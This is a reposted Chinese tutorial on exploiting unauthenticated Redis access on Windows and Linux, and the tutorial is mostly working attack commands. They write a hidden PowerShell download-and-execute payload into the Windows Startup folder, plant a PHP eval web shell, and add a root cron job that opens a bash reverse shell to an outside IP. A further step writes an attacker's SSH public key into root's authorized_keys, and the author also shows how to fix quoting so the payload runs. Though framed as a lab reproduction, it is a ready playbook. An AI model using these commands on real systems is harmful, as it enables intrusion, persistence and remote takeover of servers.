IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 【漏洞复现】redis未授权访问windows+linux利用方法 -> 正文阅读

[系统运维]【漏洞复现】redis未授权访问windows+linux利用方法

windows利用方法

通过端口扫描扫描到靶机开放6379
在这里插入图片描述

启动项

通过写入到windows启动项进行开机自启动提权
通过未授权访问进行连接,输入info查看是否连接成功
在这里插入图片描述
成功以后搞一个cs监听
在这里插入图片描述
生成一个powershell钓鱼命令
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:80/a’))”
通过redis未授权访问漏洞设置写入路径
config set dir “C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/”
在这里插入图片描述
设置写入文件
config set dbfilename 1.bat
在这里插入图片描述
这里看了一下网上,发现复制的都是错的,后来发现"闭合问题使用\注释之后才可正常写入能上线的powershell
set x “\r\n\r\npowershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx/a’))”\r\n\r\n”
在这里插入图片描述
save
在这里插入图片描述
重启之后直接上线
在这里插入图片描述

webshell写入

此处linux和windows一样就不在linux复现了
写入webshell
设置写入web路径
config set dir c:/phpstudy/www
在这里插入图片描述
设置写入文件
config set dbfilename shell.php
在这里插入图片描述
写入内容
set x “<php @eval($_POST[‘swzaq’]) ?>”
在这里插入图片描述
save
在这里插入图片描述
连接webshell
在这里插入图片描述

linux利用方法

计划任务

获取info信息
在这里插入图片描述
监听端口444
在这里插入图片描述
执行如下命令大概一分钟内反弹shell
set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.105/444 0>&1\n\n”
config set dir /var/spool/cron
config set dbfilename root
save
在这里插入图片描述

ssh公私钥

使用客户端生成私钥
ssh-keygen -t rsa
在这里插入图片描述
将生成的公钥保存成1.txt
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt
在这里插入图片描述

将保存的公钥1.txt写入redis
cat 1.txt | redis-cli -h 10.10.10.135 -x set crack
在这里插入图片描述
更改redis备份文件路径,设置上传文件名为authorized_keys
config set dir /root/.ssh
CONFIG SET dbfilename authorized_keys
save保存之后直接ssh -i id_rsa root@192.168.80.130登录
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-07-27 16:38:53  更:2021-07-27 16:40:35 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 11:16:34-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计